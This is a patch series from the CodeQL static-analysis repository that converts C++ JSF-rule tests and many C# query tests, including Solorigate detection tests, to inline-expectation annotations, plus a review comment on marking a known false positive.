diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c index b106f648aaa5..b5c1309c07ea 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c @@ -10,14 +10,14 @@ int main() j = 0; for (i = 0; i < 10; i++) { - i = 10; // BAD (for loop variable changed in body) + i = 10; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] j = 10; } // nested loops for (i = 0; i < 10; i++) { - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { // ... } @@ -26,12 +26,12 @@ int main() { for (j = 0; j < 10; j++) { - i++; // BAD (for loop variable changed in body) - j++; // BAD (for loop variable changed in body) + i++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] + j++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] k++; } - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { j++; } @@ -40,7 +40,7 @@ int main() { for (j = 0; j < 10; j++) { - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { // ... } 
@@ -50,9 +50,9 @@ int main() { for (j = 0; j < 10; j++) { - for (j = 0; j < 10; j++) // BAD (nested loops with same variable) + for (j = 0; j < 10; j++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { - j++; // BAD (for loop variable changed in body) + j++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] } } } @@ -62,17 +62,17 @@ int main() { c = *char_ptr; *char_ptr += 1; - char_ptr += 1; // BAD (for loop variable changed in body) + char_ptr += 1; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] } // more nested loops for (i = 0; i < 10; i++) { - for (j = 0; j < 10; i++) // BAD (for loop variable changed in body) + for (j = 0; j < 10; i++) // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] { } - for (i = 0; j < 10; j++) // BAD (for loop variable changed in body) + for (i = 0; j < 10; j++) // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] { } } diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref index f972ec2b8b84..95b0090d38d1 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 201.ql +query: jsf/4.24 Control Flow Structures/AV Rule 201.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref index 699de5e67d17..3a75252c4109 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref 
+++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref @@ -1 +1,2 @@ -Likely Bugs/NestedLoopSameVar.ql +query: Likely Bugs/NestedLoopSameVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp index ef9f5ac51d8d..62e7cbe1c409 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp @@ -18,12 +18,12 @@ int main() { } - for (s1.b = 0; s1.b < 10; s1.b++) // BAD: same loop variable as a surrounding loop + for (s1.b = 0; s1.b < 10; s1.b++) // BAD: same loop variable as a surrounding loop // $ Alert[cpp/nested-loops-with-same-variable] { } s2.b++; // GOOD - s1.b++; // BAD: modifies loop counter of a surrounding loop + s1.b++; // BAD: modifies loop counter of a surrounding loop // $ Alert[cpp/loop-variable-changed] } } } diff --git a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c index 57f5432c7024..76a5c0fdf6af 100644 --- a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c +++ b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c @@ -1,5 +1,5 @@ -union myUnion1 { // BAD +union myUnion1 { // BAD // $ Alert int asInt; char asChar[4]; }; 
@@ -16,17 +16,17 @@ union myUnion3 { // GOOD void test1(int *myIntPtr) { - short *myShortPtr = (short *)myIntPtr; // BAD - long long *myLongPtr = (long long *)myIntPtr; // BAD + short *myShortPtr = (short *)myIntPtr; // BAD // $ Alert + long long *myLongPtr = (long long *)myIntPtr; // BAD // $ Alert int myArray[10]; myIntPtr = (int *)myArray; // GOOD - myShortPtr = (short *)myArray; // BAD [BUT DOUBLY REPORTED] + myShortPtr = (short *)myArray; // BAD [BUT DOUBLY REPORTED] // $ Alert return 0; } -union myUnion4 { // GOOD? [FALSE POSITIVE] +union myUnion4 { // GOOD? [FALSE POSITIVE] // $ Alert char myChar; int myInt; }; diff --git a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref index 093bf9f081e5..fe56120cad85 100644 --- a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref +++ b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref @@ -1 +1,2 @@ -jsf/4.28 Portable Code/AV Rule 210.ql +query: jsf/4.28 Portable Code/AV Rule 210.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql From 11e99a03d531c945416c5dd0769d960a9d64786c Mon Sep 17 00:00:00 2001 
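Review bot: The new expectation on `union myUnion4 { // GOOD? [FALSE POSITIVE] // $ Alert` records a result that the existing comment calls a false positive as if it were a wanted alert. The inline-expectations format has a `SPURIOUS:` marker for this case, so the line could read `union myUnion4 { // GOOD? [FALSE POSITIVE] // $ SPURIOUS: Alert`, which keeps the test passing and leaves the known imprecision visible to whoever next tunes the query. In the same hunk, `myShortPtr = (short *)myArray; // BAD [BUT DOUBLY REPORTED]` carries a single `Alert`; it is worth confirming that one tag is the intended way to cover both reported results.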
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:22 +0200 Subject: [PATCH 03/15] C# --- .../ModifiedFnvFunctionDetection.qlref | 3 +- .../NumberOfKnownCommandsAboveThreshold.qlref | 3 +- .../NumberOfKnownHashesAboveThreshold.qlref | 3 +- .../NumberOfKnownLiteralsAboveThreshold.qlref | 3 +- ...mberOfKnownMethodNamesAboveThreshold.qlref | 3 +- .../SwallowEverythingExceptionHandler.qlref | 3 +- .../Solorigate/test/Solorigate/test.cs | 430 +++++++++--------- .../DatabaseQualityDiagnostics.qlref | 2 +- .../DatabaseQualityDiagnostics.qlref | 2 +- .../CWE-918/RequestForgery.expected | 2 +- .../experimental/CWE-918/RequestForgery.qlref | 3 +- ...urity-validations-always-return-true.qlref | 3 +- .../JsonWebTokenHandler/delegation-test.cs | 14 +- .../security-validation-disabled-test.cs | 10 +- .../security-validation-disabled.qlref | 3 +- .../DefiningDatasetRelatedType.qlref | 3 +- ...finingPotentiallyUnsafeXmlSerializer.qlref | 3 +- ...UnsafeTypeUsedDataContractSerializer.qlref | 3 +- .../XmlDeserializationWithDataSet.qlref | 3 +- .../Security Features/Serialization/test0.cs | 14 +- .../DangerousNativeFunctionCall.qlref | 3 +- .../backdoor/PotentialTimeBomb.expected | 18 +- .../backdoor/PotentialTimeBomb.qlref | 3 +- .../ProcessNameToHashTaintFlow.expected | 2 +- .../backdoor/ProcessNameToHashTaintFlow.qlref | 3 +- .../Security Features/backdoor/test.cs | 2 +- .../library-tests/arguments/PrintAst.qlref | 2 +- .../library-tests/assignments/PrintAst.qlref | 2 +- .../library-tests/attributes/PrintAst.qlref | 2 +- .../library-tests/comments/PrintAst.qlref | 2 +- .../compilations/CompilerError.qlref | 2 +- .../compilations/CompilerMessage.qlref | 2 +- .../compilations/ExtractorError.qlref | 2 +- .../compilations/ExtractorMessage.qlref | 2 +- .../library-tests/constructors/PrintAst.qlref | 2 +- .../conversion/operator/PrintAst.qlref | 2 +- .../library-tests/csharp11/PrintAst.qlref | 2 +- .../test/library-tests/csharp6/PrintAst.qlref | 2 +- 
.../library-tests/csharp7.1/PrintAst.qlref | 2 +- .../library-tests/csharp7.2/PrintAst.qlref | 2 +- .../library-tests/csharp7.3/PrintAst.qlref | 2 +- .../test/library-tests/csharp7/PrintAst.qlref | 2 +- .../test/library-tests/csharp8/PrintAst.qlref | 2 +- .../test/library-tests/csharp9/PrintAst.qlref | 2 +- .../dataflow/implicittostring/PrintAst.qlref | 2 +- .../dataflow/tuples/PrintAst.qlref | 2 +- .../library-tests/definitions/PrintAst.qlref | 2 +- .../definitions/definitions.qlref | 2 +- .../library-tests/delegates/PrintAst.qlref | 2 +- .../DiagnosticExtractorErrors.qlref | 2 +- .../diagnostics/ExtractedFiles.qlref | 2 +- .../test/library-tests/dynamic/PrintAst.qlref | 2 +- .../test/library-tests/enums/PrintAst.qlref | 2 +- .../test/library-tests/events/PrintAst.qlref | 2 +- .../library-tests/exceptions/PrintAst.qlref | 2 +- .../library-tests/expressions/PrintAst.qlref | 2 +- .../library-tests/extension/PrintAst.qlref | 2 +- .../test/library-tests/fields/PrintAst.qlref | 2 +- .../filters/ClassifyFiles/ClassifyFiles.qlref | 2 +- .../library-tests/generics/PrintAst.qlref | 2 +- .../ql/test/library-tests/goto/PrintAst.qlref | 2 +- .../library-tests/indexers/PrintAst.qlref | 2 +- .../library-tests/initializers/PrintAst.qlref | 2 +- .../ql/test/library-tests/linq/PrintAst.qlref | 2 +- .../test/library-tests/members/PrintAst.qlref | 2 +- .../test/library-tests/methods/PrintAst.qlref | 2 +- .../test/library-tests/nameof/PrintAst.qlref | 2 +- .../library-tests/namespaces/PrintAst.qlref | 2 +- .../library-tests/nestedtypes/PrintAst.qlref | 2 +- .../library-tests/operators/PrintAst.qlref | 2 +- .../test/library-tests/partial/PrintAst.qlref | 2 +- .../library-tests/properties/PrintAst.qlref | 2 +- .../library-tests/statements/PrintAst.qlref | 2 +- .../stringinterpolation/PrintAst.qlref | 2 +- .../test/library-tests/types/PrintAst.qlref | 2 +- .../test/library-tests/unsafe/PrintAst.qlref | 2 +- .../CallToGCCollect/CallToGCCollect.qlref | 3 +- 
.../CallToGCCollect/CallToGCCollectBad.cs | 2 +- .../CallToObsoleteMethod.cs | 2 +- .../CallToObsoleteMethod.qlref | 3 +- .../CallToObsoleteMethodBad.cs | 2 +- .../ClassDoesNotImplementEquals.cs | 6 +- .../ClassDoesNotImplementEquals.qlref | 3 +- .../ClassDoesNotImplementEqualsBad.cs | 2 +- .../ClassImplementsICloneable.qlref | 3 +- .../ClassImplementsICloneableBad.cs | 4 +- .../DisposeNotCalledOnException.cs | 6 +- .../DisposeNotCalledOnException.qlref | 3 +- .../DisposeNotCalledOnExceptionBad.cs | 4 +- .../InconsistentEqualsGetHashCode.cs | 4 +- .../InconsistentEqualsGetHashCode.qlref | 3 +- .../InconsistentEqualsGetHashCodeBad.cs | 2 +- .../IncorrectCompareToSignature.cs | 2 +- .../IncorrectCompareToSignature.qlref | 3 +- .../IncorrectCompareToSignatureBad.cs | 2 +- .../IncorrectEqualsSignature.cs | 2 +- .../IncorrectEqualsSignature.qlref | 3 +- .../IncorrectEqualsSignatureBad.cs | 2 +- .../MissingDisposeCall/MissingDisposeCall.cs | 8 +- .../MissingDisposeCall.qlref | 3 +- .../MissingDisposeCallBad.cs | 2 +- .../MissingDisposeMethod.cs | 12 +- .../MissingDisposeMethod.qlref | 3 +- .../MissingDisposeMethodBad.cs | 2 +- .../NonOverridingMethod.cs | 4 +- .../NonOverridingMethod.qlref | 3 +- .../NonOverridingMethodBad.cs | 2 +- .../NullArgumentToEquals.cs | 6 +- .../NullArgumentToEquals.qlref | 3 +- .../NullArgumentToEqualsBad.cs | 2 +- .../UncheckedReturnValue.cs | 12 +- .../UncheckedReturnValue.qlref | 3 +- .../UncheckedReturnValueBad.cs | 4 +- .../BlockCodeResponseWrite.qlref | 2 +- .../ComplexInlineCode/ComplexInlineCode.qlref | 2 +- .../NonInternationalizedText.qlref | 2 +- .../SplitControlStructure.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../MutualDependency/MutualDependency.qlref | 3 +- .../MutualDependency/MutualDependencyBad.cs | 2 +- .../FeatureEnvy/FeatureEnvy.qlref | 3 +- .../FeatureEnvy/FeatureEnvyBad.cs | 2 +- .../InappropriateIntimacy.cs | 4 +- .../InappropriateIntimacy.qlref | 3 +- .../CommentedOutCode/CommentedOutCode.cs | 2 
+- .../CommentedOutCode/CommentedOutCode.qlref | 3 +- .../Comments/TodoComments/TodoComments.cs | 4 +- .../Comments/TodoComments/TodoComments.qlref | 3 +- .../Comments/TodoComments/TodoCommentsBad.cs | 2 +- .../EmptyInterface/EmptyInterface.qlref | 3 +- .../EmptyInterface/EmptyInterfaceBad.cs | 2 +- .../LocalScopeVariableShadowsMember.cs | 12 +- .../LocalScopeVariableShadowsMember.qlref | 3 +- .../LocalScopeVariableShadowsMemberBad.cs | 2 +- .../NoConstantsOnly/NoConstantsOnly.cs | 2 +- .../NoConstantsOnly/NoConstantsOnly.qlref | 3 +- .../NoConstantsOnly/NoConstantsOnlyBad.cs | 2 +- .../TooManyRefParameters.qlref | 3 +- .../TooManyRefParametersBad.cs | 2 +- .../EmptyCatchBlock/EmptyCatchBlock.cs | 2 +- .../EmptyCatchBlock/EmptyCatchBlock.qlref | 3 +- .../AbstractToConcreteCollection.cs | 2 +- .../AbstractToConcreteCollection.qlref | 3 +- .../AbstractToConcreteCollectionBad.cs | 2 +- .../ExposeRepresentation.cs | 2 +- .../ExposeRepresentation.qlref | 3 +- .../ExposeRepresentationBad.cs | 2 +- .../StaticArray/StaticArray.cs | 6 +- .../StaticArray/StaticArray.qlref | 3 +- .../StaticArray/StaticArrayBad.cs | 2 +- .../ConfusingMethodNames.qlref | 3 +- .../ConfusingMethodNames/Program.cs | 2 +- .../VariableNameTooShort.cs | 6 +- .../VariableNameTooShort.qlref | 3 +- .../Bad Practices/Path Combine/PathCombine.cs | 2 +- .../Path Combine/PathCombine.qlref | 3 +- .../VirtualCallInConstructorOrDestructor.cs | 10 +- ...VirtualCallInConstructorOrDestructor.qlref | 3 +- .../CompareIdenticalValues.cs | 48 +- .../CompareIdenticalValues.qlref | 3 +- .../FutileSyncOnField/FutileSyncOnField.cs | 6 +- .../FutileSyncOnField/FutileSyncOnField.qlref | 3 +- .../Concurrency/LockOrder/LockOrder.cs | 6 +- .../Concurrency/LockOrder/LockOrder.qlref | 3 +- .../Concurrency/LockOrder/LockOrderBad.cs | 2 +- .../Concurrency/LockThis/LockThis.cs | 2 +- .../Concurrency/LockThis/LockThis.qlref | 3 +- .../Concurrency/LockedWait/LockedWait.cs | 30 +- .../Concurrency/LockedWait/LockedWait.qlref | 3 +- 
.../SynchSetUnsynchGet/SynchSetUnsynchGet.cs | 4 +- .../SynchSetUnsynchGet.qlref | 3 +- .../UnsafeLazyInitialization.cs | 12 +- .../UnsafeLazyInitialization.qlref | 3 +- .../UnsynchronizedStaticAccess.cs | 4 +- .../UnsynchronizedStaticAccess.qlref | 3 +- .../EmptyPasswordInConfigurationFile.qlref | 2 +- .../PasswordInConfigurationFile.qlref | 2 +- .../NonAssignedFields/NonAssignedFields.cs | 4 +- .../NonAssignedFields/NonAssignedFields.qlref | 3 +- .../Dead Code/Tests/DeadRefTypes.qlref | 3 +- .../Dead Code/Tests/UnusedField.qlref | 3 +- .../Dead Code/Tests/UnusedMethod.qlref | 3 +- .../query-tests/Dead Code/Tests/deadcode.cs | 4 +- .../query-tests/Dead Code/Tests/regression.cs | 20 +- .../Documentation/XmldocExtraParam.qlref | 3 +- .../Documentation/XmldocExtraTypeParam.qlref | 3 +- .../Documentation/XmldocMissing.qlref | 3 +- .../XmldocMissingException.qlref | 3 +- .../Documentation/XmldocMissingParam.qlref | 3 +- .../Documentation/XmldocMissingReturn.qlref | 3 +- .../Documentation/XmldocMissingSummary.qlref | 3 +- .../XmldocMissingTypeParam.qlref | 3 +- .../Documentation/documentation.cs | 16 +- .../test/query-tests/EmptyBlock/EmptyBlock.cs | 6 +- .../query-tests/EmptyBlock/EmptyBlock.qlref | 3 +- .../CatchOfGenericException.cs | 6 +- .../CatchOfGenericException.qlref | 3 +- .../Language Abuse/ChainedIs/ChainedIs.cs | 2 +- .../Language Abuse/ChainedIs/ChainedIs.qlref | 3 +- .../DubiousTypeTestOfThis.cs | 4 +- .../DubiousTypeTestOfThis.qlref | 3 +- .../DubiousTypeTestOfThis2.cs | 2 +- .../ForeachCapture/ForeachCapture.cs | 4 +- .../ForeachCapture/ForeachCapture.qlref | 3 +- .../MissedTernaryOpportunity.cs | 4 +- .../MissedTernaryOpportunity.qlref | 3 +- .../Language Abuse/NestedIf/NestedIf.qlref | 3 +- .../Language Abuse/NestedIf/nestedif.cs | 6 +- .../RethrowException/RethrowException.cs | 4 +- .../RethrowException/RethrowException.qlref | 3 +- .../SimplifyBoolExpr/SimplifyBoolExpr.cs | 60 +-- .../SimplifyBoolExpr/SimplifyBoolExpr.qlref | 3 +- 
.../SimplifyBoolExpr/SimplifyBoolExprBad.cs | 6 +- .../UselessCastToSelf/UselessCastToSelf.cs | 14 +- .../UselessCastToSelf/UselessCastToSelf.qlref | 3 +- .../UselessIsBeforeAs/UselessIsBeforeAs.cs | 2 +- .../UselessIsBeforeAs/UselessIsBeforeAs.qlref | 3 +- .../UselessNullCoalescingExpression.cs | 16 +- .../UselessNullCoalescingExpression.qlref | 3 +- .../UselessUpcast/UselessUpcast.cs | 16 +- .../UselessUpcast/UselessUpcast.qlref | 3 +- .../UselessUpcast/UselessUpcastBad.cs | 2 +- .../Likely Bugs/BadCheckOdd/BadCheckOdd.cs | 8 +- .../Likely Bugs/BadCheckOdd/BadCheckOdd.qlref | 3 +- .../ContainerLengthCmpOffByOne.cs | 8 +- .../ContainerLengthCmpOffByOne.qlref | 3 +- .../ContainerSizeCmpZero.cs | 60 +-- .../ContainerSizeCmpZero.qlref | 3 +- .../DangerousNonShortCircuitLogic.cs | 8 +- .../DangerousNonShortCircuitLogic.qlref | 3 +- .../Likely Bugs/Dynamic/BadDynamicCall.qlref | 3 +- .../Likely Bugs/Dynamic/dynamic.cs | 30 +- .../Likely Bugs/EqualsArray/EqualsArray.cs | 8 +- .../Likely Bugs/EqualsArray/EqualsArray.qlref | 3 +- .../Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs | 2 +- .../EqualsUsesAs/EqualsUsesAs.qlref | 3 +- .../Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs | 2 +- .../EqualsUsesIs/EqualsUsesIs.qlref | 3 +- .../IncomparableEquals/IncomparableEquals.cs | 2 +- .../IncomparableEquals.qlref | 3 +- .../InconsistentCompareTo.cs | 8 +- .../InconsistentCompareTo.qlref | 3 +- .../MishandlingJapaneseEra.qlref | 3 +- .../MishandlingJapaneseEra/Program.cs | 12 +- .../NestedLoopsSameVariable.cs | 2 +- .../NestedLoopsSameVariable.qlref | 3 +- .../NestedLoopsSameVariable/Test.cs | 8 +- .../ObjectComparison/ObjectComparison.cs | 8 +- .../ObjectComparison/ObjectComparison.qlref | 3 +- .../PossibleLossOfPrecision.cs | 28 +- .../PossibleLossOfPrecision.qlref | 3 +- .../RandomUsedOnce/RandomUsedOnce.cs | 10 +- .../RandomUsedOnce/RandomUsedOnce.qlref | 3 +- .../RecursiveEquals/RecursiveEquals.cs | 2 +- .../RecursiveEquals/RecursiveEquals.qlref | 3 +- 
.../SelfAssignment/SelfAssignment.qlref | 3 +- .../Likely Bugs/SelfAssignment/selfassigns.cs | 22 +- .../StaticFieldWrittenByInstance.cs | 6 +- .../StaticFieldWrittenByInstance.qlref | 3 +- .../StringBufferCharInit.qlref | 3 +- .../StringBuilderCharInit.cs | 10 +- .../ThreadUnsafeICryptoTransform.cs | 10 +- .../ThreadUnsafeICryptoTransform.qlref | 3 +- .../ThreadUnsafeICryptoTransformLambda.cs | 8 +- .../ThreadUnsafeICryptoTransformLambda.qlref | 3 +- .../UncheckedCastInEquals.cs | 2 +- .../UncheckedCastInEquals.qlref | 3 +- .../UnsafeYearConstruction/Program.cs | 10 +- .../UnsafeYearConstruction.expected | 8 +- .../UnsafeYearConstruction.qlref | 3 +- .../MissedCastOpportunity.cs | 8 +- .../MissedCastOpportunity.qlref | 3 +- .../MissedWhereOpportunity.cs | 8 +- .../MissedWhereOpportunity.qlref | 3 +- .../MagicConstants/AttributeInts.cs | 2 +- .../MagicConstants/AttributeStrings.cs | 2 +- .../MagicConstants/AttributeStrings.qlref | 3 +- .../query-tests/MagicConstants/HashCode.cs | 2 +- .../MagicConstantsNumbers.qlref | 3 +- .../MagicConstants/MagicNumbersUseConstant.cs | 4 +- .../MagicNumbersUseConstant.qlref | 3 +- .../MagicConstants/MagicStringsUseConstant.cs | 4 +- .../MagicStringsUseConstant.qlref | 3 +- .../flinesofcommentedcode.qlref | 2 +- .../RefTypes/TNumberOfFields/EnumSize.qlref | 2 +- .../Metrics/Summaries/LinesOfCode.qlref | 2 +- .../StringBuilderInLoop.cs | 4 +- .../StringBuilderInLoop.qlref | 3 +- .../StringConcatenationInLoop.cs | 4 +- .../StringConcatenationInLoop.qlref | 3 +- .../UseTryGetValue/UseTryGetValue.cs | 20 +- .../UseTryGetValue/UseTryGetValue.qlref | 3 +- .../ReadOnlyContainer/ReadOnlyContainer.cs | 24 +- .../ReadOnlyContainer/ReadOnlyContainer.qlref | 3 +- .../CWE-011/ASPNetDebug.qlref | 2 +- .../ASPNetMaxRequestLength.qlref | 2 +- .../ASPNetPagesValidateRequest.qlref | 2 +- .../ASPNetRequestValidationMode.qlref | 2 +- .../ExternalAPIsUsedWithUntrustedData.qlref | 2 +- .../CWE-020/RuntimeChecksBypass.cs | 6 +- 
.../CWE-020/RuntimeChecksBypassBad.cs | 2 +- .../CWE-020/RuntimeChecksbypass.qlref | 3 +- .../CWE-079/XSSRazorPages/XSS.qlref | 2 +- .../CWE-119/LocalUnvalidatedArithmetic.cs | 2 +- .../CWE-119/LocalUnvalidatedArithmetic.qlref | 3 +- .../MissingASPNETGlobalErrorHandler.qlref | 2 +- .../MissingASPNETGlobalErrorHandler.qlref | 3 +- .../WebFormsTests/MissingAccessControl.qlref | 3 +- .../WebFormsTests/Test1/EditProfile.aspx.cs | 2 +- .../WebFormsTests/Test1/ViewProfile.aspx.cs | 2 +- .../WebFormsTests/Test3/B/EditProfile.aspx.cs | 2 +- .../CWE-312/CleartextStorage.cs | 18 +- .../CWE-312/CleartextStorage.expected | 20 +- .../CWE-312/CleartextStorage.qlref | 3 +- .../DontInstallRootCert.expected | 8 +- .../DontInstallRootCert.qlref | 3 +- .../CWE-327/DontInstallRootCert/Test.cs | 12 +- .../InsecureSQLConnection.cs | 10 +- .../InsecureSQLConnection.expected | 8 +- .../InsecureSQLConnection.qlref | 3 +- .../InsufficientKeySize.cs | 6 +- .../InsufficientKeySize.qlref | 3 +- .../MissingAntiForgeryTokenValidation.qlref | 3 +- .../MissingAntiForgeryTokenValidation.cs | 4 +- .../MissingAntiForgeryTokenValidation.qlref | 3 +- .../CWE-359/ExposureOfPrivateInformation.cs | 10 +- .../ExposureOfPrivateInformation.expected | 12 +- .../ExposureOfPrivateInformation.qlref | 3 +- .../CWE-384/AbandonSession.cs | 6 +- .../CWE-384/AbandonSession.qlref | 3 +- .../MissingXFrameOptions.qlref | 3 +- .../NoHeader/MissingXFrameOptions.qlref | 2 +- .../MissingXFrameOptions.qlref | 3 +- .../MissingXFrameOptions.qlref | 3 +- .../PersistentCookie/PersistentCookie.cs | 4 +- .../PersistentCookie/PersistentCookie.qlref | 3 +- .../CWE-548/ASPNetDirectoryListing.qlref | 2 +- .../RequireSSL/AddedInCode/RequireSSL.qlref | 3 +- .../RequireSSL/AddedInForms/RequireSSL.qlref | 3 +- .../HttpCookiesCorrect/RequireSSL.qlref | 2 +- .../RequireSSLMissing/RequireSSL.qlref | 2 +- .../CWE-639/MVCTests/CommentController.cs | 4 +- .../InsecureDirectObjectReference.qlref | 3 +- .../CWE-639/MVCTests/MiscTestControllers.cs 
| 6 +- .../CWE-639/MVCTests/ProfileController.cs | 2 +- .../CWE-639/WebFormsTests/EditComment.aspx.cs | 2 +- .../InsecureDirectObjectReference.qlref | 3 +- .../HardcodedConnectionString.expected | 6 +- .../CWE-798/HardcodedConnectionString.qlref | 3 +- .../CWE-798/HardcodedCredentials.cs | 18 +- .../CWE-798/HardcodedCredentials.expected | 18 +- .../CWE-798/HardcodedCredentials.qlref | 3 +- .../CWE-798/TestHardcodedCredentials.cs | 2 +- .../LibraryUsage/ExternalLibraryUsage.qlref | 2 +- .../LibraryUsage/SupportedExternalTaint.qlref | 2 +- .../UnsupportedExternalAPIs.qlref | 2 +- .../SupportedExternalApis.qlref | 2 +- .../SupportedExternalSinks.qlref | 2 +- .../SupportedExternalSources.qlref | 2 +- .../UnusedPropertyValue.cs | 6 +- .../UnusedPropertyValue.qlref | 3 +- .../test/query-tests/UseBraces/UseBraces.cs | 10 +- .../query-tests/UseBraces/UseBraces.qlref | 3 +- .../PointlessForwardingMethod.cs | 4 +- .../PointlessForwardingMethod.qlref | 3 +- .../WriteOnlyContainer/WriteOnlyContainer.cs | 68 +-- .../WriteOnlyContainer.qlref | 3 +- .../IncomparableEquals/IncomparableEquals.cs | 6 +- .../IncomparableEquals.qlref | 3 +- .../ObjectComparison/ObjectComparison.cs | 4 +- .../ObjectComparison/ObjectComparison.qlref | 3 +- .../ApplicationModeEndpoints.qlref | 2 +- .../modeleditor/FrameworkModeEndpoints.qlref | 2 +- 373 files changed, 1176 insertions(+), 1036 deletions(-) diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref index 0bfdf5905b36..d861fc929b23 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref @@ -1 +1,2 @@ -ModifiedFnvFunctionDetection.ql +query: ModifiedFnvFunctionDetection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref
index 61c6c1e04a80..6854e44501fe 100644
--- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref
+++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref
@@ -1 +1,2 @@
-NumberOfKnownCommandsAboveThreshold.ql
+query: NumberOfKnownCommandsAboveThreshold.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref
index 718d6c67048c..a66d6d55d198 100644
--- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref
+++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref
@@ -1 +1,2 @@
-NumberOfKnownHashesAboveThreshold.ql
+query: NumberOfKnownHashesAboveThreshold.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref
index e17b18d08ae5..38b9897d0685 100644
--- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref
+++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref
@@ -1 +1,2 @@
-NumberOfKnownLiteralsAboveThreshold.ql
+query: NumberOfKnownLiteralsAboveThreshold.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
